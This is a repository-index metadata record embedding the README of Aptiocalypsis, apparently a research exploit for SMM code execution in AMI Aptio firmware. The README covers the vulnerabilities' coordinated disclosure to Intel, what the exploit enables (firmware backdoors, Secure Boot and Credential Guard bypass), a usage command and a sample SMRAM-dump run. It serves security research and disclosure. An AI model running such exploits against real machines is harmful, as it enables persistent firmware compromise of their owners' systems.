{"id":21510106,"url":"https://github.com/cr4sh/aptiocalypsis","last_synced_at":"2025-04-09T17:31:32.948Z","repository":{"id":43621194,"uuid":"71630197","full_name":"Cr4sh/Aptiocalypsis","owner":"Cr4sh","description":"Arbitrary SMM code execution exploit for industry-wide 0day vulnerability in AMI Aptio based firmwares","archived":false,"fork":false,"pushed_at":"2016-10-22T17:27:11.000Z","size":25,"stargazers_count":66,"open_issues_count":0,"forks_count":16,"subscribers_count":9,"default_branch":"master","last_synced_at":"2025-03-23T19:39:06.831Z","etag":null,"topics":["0day","ami","exploit","firmware","intel","smm","uefi","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Cr4sh.png","metadata":{"files":{"readme":"README.TXT","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-10-22T09:42:25.000Z","updated_at":"2025-03-16T11:05:25.000Z","dependencies_parsed_at":"2022-09-13T12:51:34.772Z","dependency_job_id":null,"html_url":"https://github.com/Cr4sh/Aptiocalypsis","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FAptiocalypsis","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FAptiocalypsis/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FAptiocalypsis/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FAptiocalypsis/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Cr4sh","download_url":"https://codeload.github.com/Cr4sh/A
ptiocalypsis/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248077336,"owners_count":21043940,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["0day","ami","exploit","firmware","intel","smm","uefi","vulnerability"],"created_at":"2024-11-23T21:46:41.536Z","updated_at":"2025-04-09T17:31:32.814Z","avatar_url":"https://github.com/Cr4sh.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\nAptiocalypsis: arbitrary System Management Mode code execution exploit\nfor AMI Aptio based firmware.\n\n**************************************************************************\n\nFor more information about this project please read the following article:\n\nhttp://blog.cr4.sh/2016/10/exploiting-ami-aptio-firmware.html\n\n\nThis code exploits a vulnerability in UEFI SMM drivers of AMI Aptio based firmware to execute arbitrary SMM code. Running arbitrary System Management Mode code allows an attacker to disable flash write protection and infect platform firmware with a persistent backdoor that survives OS reinstall, disable Secure Boot, bypass Virtual Secure Mode (Credential Guard, etc.) on Windows 10 Enterprise and do other evil things. Also, the Aptiocalypsis exploit is the first publicly demonstrated successful attempt at breaking the SMM_Code_Chk_En exploit mitigation feature that is present on Intel CPUs starting from the Haswell microarchitecture.\n\nThe vulnerability was discovered during reverse engineering of platform firmware from a 6th generation Intel NUC. 
In total I discovered three 0day vulnerabilities in the NvmeSmm, SdioSmm and UsbRt drivers from AMI and one in the ItkSmmVars driver from Intel. The vulnerabilities were reported to Intel on 15.07.2016 and after several working days both Intel and AMI confirmed all of the security issues. Intel decided to release a single advisory, INTEL-SA-00057, to cover all four vulnerabilities:\n\nhttps://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00057\u0026languageid=en-fr\n\nFixed firmware for my NUC, version SYSKLi35.86A.0051, was released on 10.08.2016:\n\nhttps://downloadcenter.intel.com/download/26195/BIOS-Update-SYSKLi35-86A-\n\nVulnerable UEFI SMM drivers are also present in computers with AMI based firmware from other manufacturers. For example, the firmware of the Asus Q170M-C motherboard has two of the four vulnerable drivers described above. At this moment it seems that Intel is the only OEM that has released an advisory and fixes for these vulnerabilities. Probably, at some point in the future we'll see some information about vulnerable products from other vendors. 
The original reports that were sent to Intel can be found in the reports/ folder:\n\nhttps://raw.githubusercontent.com/Cr4sh/Aptiocalypsis/master/reports/Intel_NUC_AMI_vuln.txt\nhttps://raw.githubusercontent.com/Cr4sh/Aptiocalypsis/master/reports/Intel_NUC_ITK_vuln.txt\n\nPlease note that at this moment even patched firmware versions still allow these vulnerabilities to be used to bypass Credential Guard and other Virtual Secure Mode powered features of Windows 10 (see the article for a detailed analysis of the Intel and AMI security fixes).\n\nThe Aptiocalypsis exploit was tested on an Intel NUC NUC6i3SYH with firmware version SYSKLi35.86A.0045; to run this exploit on any other combination of computer model and firmware version you have to add the constants needed by your firmware to the BIOS_VERSIONS array (see the article for detailed information about obtaining these constants).\n\nTo use the aptiocalypsis.py program you need to install the CHIPSEC framework (https://github.com/chipsec/chipsec).\n\nCommand line options:\n\n# python aptiocalypsis.py [\u003cdump_address\u003e \u003cdump_size\u003e [dest_file_path]]\n\nWhen the program is started with no command line options specified, it checks whether it is possible to exploit the NvmeSmm driver vulnerability on the current platform. Otherwise, it dumps the specified region of physical memory into a file, or prints its hexadecimal dump to stdout if the dest_file_path argument was not specified. 
\n\n\nExample of using aptiocalypsis.py to dump SMRAM on an Intel NUC:\n\n# python aptiocalypsis.py 0x8b400000 0x400000 /tmp/smram_dump.bin\n****** Chipsec Linux Kernel module is licensed under GPL 2.0\nSelected BIOS version is SYSKLi35.86A.0045\nDump address is 0x8b400000:8b7fffff\nPhysical memory for temporary read buffer allocated at 0x846800000\nSMM memcpy() address is 0x8b702110\nTarget \"lea reg, func_table\" instruction to patch is at 0x8b6edf4d\nTrigerring SW SMI 0x42 to overwrite byte at 0x8b6edf50 with 7...\nTrigerring SW SMI 0x42 to overwrite byte at 0x8b6edf51 with 7...\nTrigerring SW SMI 0x42 to overwrite byte at 0x8b6edf52 with 7...\n3 function arguments are at 0x00000500\nFake functions table address is 0x8a75e65b\nSMM communication buffer address is at 0x00000204\nSMM communication buffer is at 0x00000300\nTriggering SW SMI 0x31...\nSUCESS: SMM function 0x8b702110 was called\nWriting 0x400000 bytes of readed memory into the /tmp/smram_dump.bin\n\n\nWritten by:\nDmytro Oleksiuk (aka Cr4sh)\n\ncr4sh0@gmail.com\nhttp://blog.cr4.sh\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcr4sh%2Faptiocalypsis","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcr4sh%2Faptiocalypsis","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcr4sh%2Faptiocalypsis/lists"}